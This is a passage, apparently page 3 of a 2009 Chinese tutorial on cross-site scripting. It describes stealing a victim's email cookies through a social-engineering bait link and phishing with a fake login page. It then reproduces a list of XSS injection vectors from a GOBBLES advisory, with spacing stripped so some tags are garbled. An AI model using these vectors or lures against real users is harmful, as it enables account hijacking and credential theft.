WEB开发网
开发学院网络安全安全技术 简单分析跨站脚本攻击挂马利用 阅读

简单分析跨站脚本攻击挂马利用

 2009-02-12 13:55:43 来源:WEB开发网   
核心提示: <script>并没有打印到屏幕上,它是隐藏在背后执行,简单分析跨站脚本攻击挂马利用(3),由于服务器端程序并没有对<script>alert(’test’)</script> 进行有效过滤,所以在页面发回到浏览器并执行了该脚本,

<script>并没有打印到屏幕上,它是隐藏在背后执行,由于服务器端程序并没有对<script>alert(’test’)</script> 进行有效过滤,所以在页面发回到浏览器并执行了该脚本。

下面我们瞧瞧如何利用该漏洞入侵A的邮箱,首先你必须知道A的email地址,并了解cookies的作用。那么我们可以给A发送一个恶意连接,来从A机器中的cookie信息里获得有价值的信息。这里我们会利用到一些基本的社会工程欺骗,想办法让A访问myemailserver.tld站点发表的文章,如,“亲爱的A,美女图片快来欣赏?”

那么当A访问 www.myemailserver.tld/cgi-bin/news.cgi?article= 连接时,A本地的cookie就会被攻击者截获。

当然还可以通过伪装email服务器的登陆页面,挂到其他的系统上,诱使用户登陆恶意系统页面,最终获取对方身份信息。总之,这里需要一些社会工程学欺骗,要耐心。

把javascript脚本插入WEB页面的不同方法:

<snip> 
copyfrom:GOBBLESSECURITYADVISORY#33 
Hereisacut-n-pastecollectionoftypicalJavaScript-injectionhacks 
youmayderivesomegleefromplayingwith. 
 <ahref="javascript#[code]"> 
 <divonmouseover="[code]"> 
 <imgsrc="javascript:[code]"> 
 <imgdynsrc="javascript:[code]">[IE] 
 <inputtype="image"dynsrc="javascript:[code]">[IE] 
 <bgsoundsrc="javascript:[code]">[IE] 
 &<script>[code]</script> 
 &{[code]};[N4] 
 <imgsrc=&{[code]};>[N4] 
 <linkrel="stylesheet"href="javascript:[code]"> 
 <iframesrc="vbscript:[code]">[IE] 
 <imgsrc="mocha:[code]">[N4] 
 <imgsrc="livescript:[code]">[N4] 
 <ahref="about:<script>[code]</script>"> 
 <metahttp-equiv="refresh"content="0;url=javascript:[code]"> 
 <bodyonload="[code]"> 
 <divstyle="background-image:url(javascript:[code]);"> 
 <divstyle="behaviour:url([linktocode]);">[IE] 
 <divstyle="binding:url([linktocode]);">[Mozilla] 
 <divstyle="width:expression([code]);">[IE] 
 <styletype="text/javascript">[code]</style>[N4] 
 <objectclassid="clsid:..."codebase="javascript:[code]">[IE] 
 <style><!--</style><script>[code]//--></script> 
 <![CDATA[<!--]]><script>[code]//--></script> 
 <!------><script>[code]</script><!------> 
 <script>[code]</script> 
 <imgsrc="blah"onmouseover="[code]"> 
 <imgsrc="blah>"onmouseover="[code]"> 
 <xmlsrc="javascript:[code]"> 
 <xmlid="X"><a><b><script>[code]</script>;</b></a></xml> 
 <divdatafld="b"dataformatas="html"datasrc="#X"></div> 
 [xC0][xBC]script>[code][xC0][xBC]/script>[UTF-8;IE,Opera] 
----CopiedfromGOBBLESSECURITYADVISORY#33---- 
</snip>

上一页  1 2 3 4  下一页

Tags:简单 分析 脚本

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接